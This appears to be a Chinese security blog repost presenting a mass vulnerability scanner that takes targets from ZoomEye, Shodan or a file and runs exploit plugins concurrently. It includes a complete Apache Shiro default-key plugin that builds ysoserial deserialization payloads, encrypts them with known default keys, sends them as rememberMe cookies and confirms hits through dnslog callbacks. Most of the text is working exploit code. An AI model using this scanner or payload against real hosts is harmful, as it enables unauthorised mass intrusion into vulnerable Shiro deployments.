文章来源:平头哥SEC
先上链接:
https://github.com/yuxiaokui/cloudhacker
然后上代码:
先是动态加载选择的exp,然后是导入攻击目标。
# Dynamically load the selected exploit module (vulnerability plugin).
# `host`, `target`, `pocs` and `flag` are set earlier in the script (not shown here);
# `target` and `flag` look like 1-based menu choices and `[:-3]` presumably strips a
# ".py" suffix from the chosen plugin filename -- confirm against the full script.
exp = importlib.import_module('exp.' + host[int(target)-1] + '.' + pocs[int(flag) - 1][:-3])
# Choose whether the target list comes from ZoomEye, Shodan or a local file.
api_select = input("Zoomeye or Shodan or File (z/s/f):")
if api_select == 'f':
    f = input("File:")
    with open(f) as x:
        # One target per line; the trailing newline is kept here and stripped by the worker.
        targets = x.readlines()
else:
    query = input("Query:")
    start = int(input("Start_page:"))
    end = int(input("End_page:"))
    if api_select == 'z':
        p = zoomeye(query, start, end)
    if api_select == 's':
        p = shodan_api(query, start, end)
    # NOTE(review): any answer other than 'z' or 's' leaves `p` unassigned and the
    # next line raises NameError; there is no validation of the menu input.
    targets = p.run()
然后使用协程的方式进行批量检测。
def check(self):
    """Worker loop: drain ``self.targets`` and run the loaded plugin on each entry.

    Reads the queue ``self.targets`` (``qsize``/``get``), advances ``self.pbar``
    once per target, and appends every truthy ``exp.exp`` result to
    ``self.result``. ``exp`` is the plugin module loaded elsewhere in the script.
    Any exception raised while checking one target is swallowed on purpose so a
    single failing host does not stop the worker; nothing is logged for it.
    """
    queue = self.targets
    found = self.result
    while queue.qsize() > 0:
        host = queue.get().strip()
        try:
            self.pbar.update(1)
            hit = exp.exp(host)
        except Exception:
            # Best-effort: network errors and plugin failures are ignored.
            continue
        if hit:
            found.append(hit)
def run(self):
    """Spawn ``self.threads_num`` greenlets running :meth:`check`, wait, then report.

    On Ctrl-C the partial results are printed right away; the normal summary
    (progress bar closed, every result, the count) is then printed in both the
    interrupted and the normal case, so results may appear twice. The output
    strings are part of the tool's CLI and are reproduced unchanged.
    """
    def show_results():
        for entry in self.result:
            print(entry)

    workers = [gevent.spawn(self.check) for _ in range(self.threads_num)]
    try:
        gevent.joinall(workers)
    except KeyboardInterrupt:
        print('[WARNING] User aborted')
        show_results()
    self.pbar.close()
    print("Hack it!")
    show_results()
    print("Found ", len(self.result))
    print("End!")
没错就是这么简单的几十行代码,就可以实现一个漏洞扫描器。
其实关键的地方还是写漏洞检测插件。
这里给出一个最近比较火的Shiro使用默认key的检测方式。
import os
import re
import base64
import uuid
import time
import subprocess
import requests
from Crypto.Cipher import AES
from random import randint
JAR_FILE = './lib/ysoserial.jar' # not bundled; download it separately: https://github.com/frohoff/ysoserial
# Candidate AES keys for the Shiro "rememberMe" cookie, one base64 string per line
# (decoded in generator()). The page presents them as Shiro default keys; the
# leading/trailing newlines mean a split on '\n' in exp() also yields empty strings.
keys='''
kPH+bIxk5D2deZiIxcaaaA==
4AvVhmFLUs0KTA3Kprsdag==
'''
def poc(url, rce_command,key):
    """Send one probe request to ``url`` carrying an encrypted ``rememberMe`` cookie.

    Args:
        url: ``host[:port]`` or a full URL. Without a scheme, ``https://`` is
            assumed only when the string contains ``:443``, otherwise ``http://``.
        rce_command: passed straight through to ``generator``; in ``exp()`` this
            is the dnslog callback URL, not a shell command, despite the name.
        key: base64-encoded AES key handed to ``generator``.

    Returns:
        Always ``False``. The response ``r`` is never inspected here; ``exp()``
        decides success by polling the dnslog API instead. Every exception
        (missing jar, bad key, network error) is swallowed silently.
    """
    if '://' not in url:
        target = 'https://%s' % url if ':443' in url else 'http://%s' % url
    else:
        target = url
    try:
        payload = generator(rce_command, JAR_FILE,key)
        # timeout=10 bounds each probe; the response itself is discarded.
        r = requests.get(target, cookies={'rememberMe': payload.decode()}, timeout=10)
        #print(key)
        #print(r.status_code)
    except Exception as e:
        #print (e)
        pass
    return False
def generator(command, fp,key):
    """Build the cookie value: base64(iv + AES-CBC(padded ysoserial output)).

    Args:
        command: argument handed to ysoserial's ``URLDNS`` payload generator.
        fp: path to ysoserial.jar; ``Exception`` is raised if it does not exist.
        key: base64-encoded AES key, decoded before use.

    Returns:
        ``bytes`` -- base64 of ``iv + ciphertext``; the caller ``.decode()``s it
        into the cookie string.

    NOTE(review): ``popen.stdout.read()`` reads until EOF but the process is
    never waited on, and stderr is not captured, so a java failure yields an
    empty or short body that is still padded, encrypted and sent.
    """
    if not os.path.exists(fp):
        print('Jar zai na ne ?')
        raise Exception('jar file not found!')
    popen = subprocess.Popen(['java', '-jar', fp, 'URLDNS', command],
                             stdout=subprocess.PIPE)
    BS = AES.block_size
    # Pad to a whole block with bytes whose value equals the pad length (PKCS#7 scheme).
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    mode = AES.MODE_CBC
    # 16-byte IV taken from uuid4(); it is prepended to the ciphertext below.
    iv = uuid.uuid4().bytes
    encryptor = AES.new(base64.b64decode(key), mode, iv)
    file_body = pad(popen.stdout.read())
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
    return base64_ciphertext
def exp(target):
    """Try each candidate key against ``target``; return ``(target, key)`` on a hit.

    For every line of ``keys`` (split on newlines, so the empty first and last
    lines are tried too) a random ``shrio-NNNNNN`` token is minted, one probe is
    sent with a dnslog URL built from it, and after a fixed 3 s wait the dnslog
    API is polled. Any response body other than the literal ``'False'`` counts
    as a hit.

    Returns:
        ``(target, key)`` for the first key that produced a callback, otherwise
        ``None``. The ``break`` after ``return`` is unreachable.

    The ``xxxxxx`` / ``xxxxxxxx`` segments are the author's redacted dnslog
    subdomain and API id. Because the wait is fixed rather than polled, a slow
    callback can produce a false negative.
    """
    for key in keys.split('\n'):
        token = "shrio-" + str(randint(100000,999999))
        dnslog = 'http://' + token + '.xxxxxx.dnslog.cc' # address assigned when I registered on Chamd5's dnslog platform.
        dnslog_api = "http://admin.dnslog.cc/api/dns/xxxxxxxx/%s/" % token
        poc(target, dnslog, key.strip())
        time.sleep(3)
        r = requests.get(dnslog_api)
        if r.text != 'False':
            return target,key.strip()
            break
if __name__ == '__main__':
    # Manual self-test; the return value of exp() is not printed here.
    exp('bhst.vip:20020') # this is a target box I set up with docker to verify the vulnerability 0daybank